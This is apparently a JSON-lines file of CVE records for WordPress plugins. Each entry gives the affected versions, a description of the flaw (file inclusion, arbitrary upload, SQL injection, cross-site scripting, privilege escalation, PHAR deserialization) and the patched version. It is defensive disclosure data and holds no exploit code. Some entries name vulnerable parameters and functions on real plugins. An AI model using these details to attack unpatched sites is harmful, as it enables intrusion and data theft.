{"CVE_ID":"CVE-2024-4441","slug":"xml-sitemap-feed","versionImpact":"5.4.8","versionEndExcluding":"5.4.9","description":"The XML Sitemap & Google News plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.4.8 via the 'feed' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87888350-1230-4fec-9de2-c58fa24e6a05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87888350-1230-4fec-9de2-c58fa24e6a05?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3082081%40xml-sitemap-feed&new=3082081%40xml-sitemap-feed&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3082081%40xml-sitemap-feed&new=3082081%40xml-sitemap-feed&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4391","slug":"rss-feed-post-generator-echo","versionImpact":"5.4.8.1","versionEndExcluding":"5.4.8.2","description":"The Echo RSS Feed Post Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the echo_generate_featured_image() function in all versions up to, and including, 5.4.8.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.4.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72de9f64-f3e0-4705-adc1-6c22076b382f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72de9f64-f3e0-4705-adc1-6c22076b382f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9265","slug":"rss-feed-post-generator-echo","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Echo RSS Feed Post Generator plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.4.6. This is due to the plugin not properly restricting the roles that can be set during registration through the echo_check_post_header_sent() function. This makes it possible for unauthenticated attackers to register as an administrator.","recommendation":"Update to version 5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c099f401-4b05-4532-8e31-af1b1dea7eca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c099f401-4b05-4532-8e31-af1b1dea7eca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/echo-rss-feed-post-generator-plugin-for-wordpress\\\/19486974\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9874","slug":"poll-maker","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 5.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7e8284-d70f-4448-8f0d-99c23b8eda79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7e8284-d70f-4448-8f0d-99c23b8eda79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179500\\\/WordPress-Poll-Maker-5.3.2-SQL-Injection.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179500\\\/WordPress-Poll-Maker-5.3.2-SQL-Injection.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-results-list-table.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-results-list-table.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.7\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.7\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L48\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9475","slug":"poll-maker","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to generic SQL Injection via the order_by parameter in all versions up to, and including, 5.4.6  due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8798e16d-84dd-40bb-b4ff-db800e850b0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8798e16d-84dd-40bb-b4ff-db800e850b0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.5\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.5\\\/includes\\\/lists\\\/class-poll-maker-each-results-poll-list-table.php#L56\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9462","slug":"poll-maker","versionImpact":"5.4.6","versionEndExcluding":"5.4.7","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Stored Cross-Site Scripting via poll settings in all versions up to, and including, 5.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 5.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e6434fb-390d-439d-bf3e-9afe8644fd58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e6434fb-390d-439d-bf3e-9afe8644fd58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L362\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poll-maker\\\/tags\\\/5.4.6\\\/includes\\\/lists\\\/class-poll-maker-polls-list-table.php#L362\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4642","slug":"kk-star-ratings","versionImpact":"5.4.5","versionEndExcluding":"5.4.6","description":"The kk Star Ratings WordPress plugin before 5.4.6 does not implement atomic operations, allowing one user vote multiple times on a poll due to a Race Condition.","recommendation":"Update to version 5.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f481d34-6feb-4af2-914c-1f3288f69207\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6f481d34-6feb-4af2-914c-1f3288f69207\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-32121","slug":"zero-spam","versionEndExcluding":"5.4.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Highfivery LLC Zero Spam for WordPress allows SQL Injection.This issue affects Zero Spam for WordPress: from n\/a through 5.4.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zero-spam\\\/wordpress-zero-spam-for-wordpress-plugin-5-4-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zero-spam\\\/wordpress-zero-spam-for-wordpress-plugin-5-4-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9349","slug":"amazon-auto-links","versionImpact":"5.4.2","versionEndExcluding":"5.4.3","description":"The Auto Amazon Links \u2013 Amazon Associates Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.4.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ebd4936-9d68-42cb-a427-a1db894b49ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ebd4936-9d68-42cb-a427-a1db894b49ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazon-auto-links\\\/tags\\\/5.4.2\\\/include\\\/core\\\/main\\\/admin\\\/report\\\/http_request\\\/AmazonAutoLinks_AdminPage_Tab_HTTPRequest.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazon-auto-links\\\/tags\\\/5.4.2\\\/include\\\/core\\\/main\\\/admin\\\/report\\\/http_request\\\/AmazonAutoLinks_AdminPage_Tab_HTTPRequest.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161302%40amazon-auto-links&new=3161302%40amazon-auto-links&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161302%40amazon-auto-links&new=3161302%40amazon-auto-links&sfp_email=&sfph_mail=#file5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1124","slug":"wp-easycart","versionEndExcluding":"5.4.3","description":"The Shopping Cart & eCommerce Store WordPress plugin before 5.4.3 does not validate HTTP requests, allowing authenticated users with admin privileges to perform LFI attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229b93cd-544b-4877-8d9f-e6debda9511c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229b93cd-544b-4877-8d9f-e6debda9511c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7694","slug":"woffice-core","versionImpact":"5.4.26","versionEndExcluding":"5.4.27","description":"The Woffice Core plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the woffice_file_manager_delete() function in all versions up to, and including, 5.4.26. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 5.4.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog\",\"name\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/woffice-intranetextranet-wordpress-theme\\\/11671924\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/woffice-intranetextranet-wordpress-theme\\\/11671924\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41a362cf-e27e-436a-85f1-7c48e2e098eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41a362cf-e27e-436a-85f1-7c48e2e098eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2797","slug":"woffice-core","versionImpact":"5.4.21","versionEndExcluding":"5.4.22","description":"The Woffice Core plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.4.21. This is due to missing or incorrect nonce validation on the 'woffice_handle_user_approval_actions' function. This makes it possible for unauthenticated attackers to approve registration for any user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.4.22, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-user-registration\\\/includes\\\/helpers.php#L52\",\"name\":\"http:\\\/\\\/localhost\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-user-registration\\\/includes\\\/helpers.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"name\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1665f2d0-899b-4f9b-91b1-e5799c3b4d3d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1665f2d0-899b-4f9b-91b1-e5799c3b4d3d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2780","slug":"woffice-core","versionImpact":"5.4.21","versionEndExcluding":"5.4.22","description":"The Woffice Core plugin for WordPress, used by the Woffice Theme, is vulnerable to arbitrary file uploads due to missing file type validation in the 'saveFeaturedImage' function in all versions up to, and including, 5.4.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.4.22, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-event\\\/class-fw-extension-woffice-event.php#L1235\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/woffice-core\\\/extensions\\\/woffice-event\\\/class-fw-extension-woffice-event.php#L1235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"name\":\"https:\\\/\\\/hub.woffice.io\\\/woffice\\\/changelog#april-1st-2025-version-5422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d057ac6-a341-4ec3-956c-2a2a5636155c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d057ac6-a341-4ec3-956c-2a2a5636155c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1565","slug":"mayosis-core","versionImpact":"5.4.1","versionEndExcluding":"5.4.2","description":"The Mayosis Core plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.4.1 via the library\/wave-audio\/peaks\/remote_dl.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 5.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/mayosis-digital-marketplace-theme\\\/20210200\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/mayosis-digital-marketplace-theme\\\/20210200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b967eb98-69f8-41c5-a19a-9d20979accb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b967eb98-69f8-41c5-a19a-9d20979accb0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11977","slug":"kk-star-ratings","versionImpact":"5.4.10","versionEndExcluding":"5.4.10.2","description":"The The kk Star Ratings \u2013 Rate Post & Collect User Feedbacks plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.4.10. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.4.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-star-ratings\\\/tags\\\/5.4.9\\\/src\\\/core\\\/wp\\\/actions\\\/wp_ajax_kk-star-ratings.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kk-star-ratings\\\/tags\\\/5.4.9\\\/src\\\/core\\\/wp\\\/actions\\\/wp_ajax_kk-star-ratings.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dea49fb-2703-4754-9abd-5f4e526d5570?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dea49fb-2703-4754-9abd-5f4e526d5570?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12210","slug":"woocommerce-delivery-notes","versionImpact":"5.4.0","versionEndExcluding":"5.4.1","description":"The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wcdn_remove_shoplogo' AJAX action in all versions up to, and including, 5.4.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove the shop's logo.","recommendation":"Update to version 5.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209682%40woocommerce-delivery-notes&new=3209682%40woocommerce-delivery-notes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209682%40woocommerce-delivery-notes&new=3209682%40woocommerce-delivery-notes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8883d4fe-3ca6-4591-9972-219b114126d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8883d4fe-3ca6-4591-9972-219b114126d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4682","slug":"essential-blocks","versionImpact":"5.4.0","versionEndExcluding":"5.4.1","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML attributes in Slider and Post Carousel widgets in all versions up to, and including, 5.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/post-carousel\\\/src\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/post-carousel\\\/src\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/slider\\\/src\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/tags\\\/5.4.0\\\/src\\\/blocks\\\/slider\\\/src\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3296386\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3296386\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f88f065d-14ca-4547-9a41-f9177979a9ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f88f065d-14ca-4547-9a41-f9177979a9ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3510","slug":"td-composer","versionImpact":"5.4","versionEndExcluding":"5.4.1","description":"The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in all versions up to, and including, 5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd6b66d-f33e-4287-850b-a199de72f6ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd6b66d-f33e-4287-850b-a199de72f6ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2056","slug":"hide-my-wp","versionImpact":"5.4.01","versionEndExcluding":"5.4.02","description":"The WP Ghost (Hide My WP Ghost) \u2013 Security & Firewall plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 5.4.01 via the showFile function. This makes it possible for unauthenticated attackers to read the contents of specific file types on the server, which can contain sensitive information.","recommendation":"Update to version 5.4.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.4.02\\\/models\\\/Files.php#L336\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.4.02\\\/models\\\/Files.php#L336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f43db496-80ea-442c-9417-7aa03ec95f02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f43db496-80ea-442c-9417-7aa03ec95f02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13794","slug":"hide-my-wp","versionImpact":"5.3.02","versionEndExcluding":"5.4.01","description":"The WP Ghost (Hide My WP Ghost) \u2013 Security & Firewall plugin for WordPress is vulnerable to Login Page Disclosure in all versions up to, and including, 5.3.02. This is due to the plugin not properly restricting the \/wp-register.php path. This makes it possible for unauthenticated attackers to discover the hidden login page location.","recommendation":"Update to version 5.4.01, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235271%40hide-my-wp&new=3235271%40hide-my-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235271%40hide-my-wp&new=3235271%40hide-my-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9effa526-7454-4490-9bf4-0605254d6625?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9effa526-7454-4490-9bf4-0605254d6625?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3342","slug":"zero-bs-crm","versionImpact":"5.3.1","versionEndExcluding":"5.4.0","description":"The Jetpack CRM plugin for WordPress is vulnerable to PHAR deserialization via the \u2018zbscrmcsvimpf\u2019 parameter in the 'zeroBSCRM_CSVImporterLitehtml_app' function in versions up to, and including, 5.3.1. While the function performs a nonce check, steps 2 and 3 of the check do not take any action upon a failed check. These steps then perform a 'file_exists' check on the value of 'zbscrmcsvimpf'. If a phar:\/\/ archive is supplied, its contents will be deserialized and an object injected in the execution stream. This allows an unauthenticated attacker to obtain object injection if they are able to upload a phar archive (for instance if the site supports image uploads) and then trick an administrator into performing an action, such as clicking a link.","recommendation":"Update to version 5.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2805282\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2805282\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php?rev=2790863\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zero-bs-crm\\\/trunk\\\/includes\\\/ZeroBSCRM.CSVImporter.php?rev=2790863\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98ab264f-b210-41d0-bb6f-b4f31d933f80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98ab264f-b210-41d0-bb6f-b4f31d933f80?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
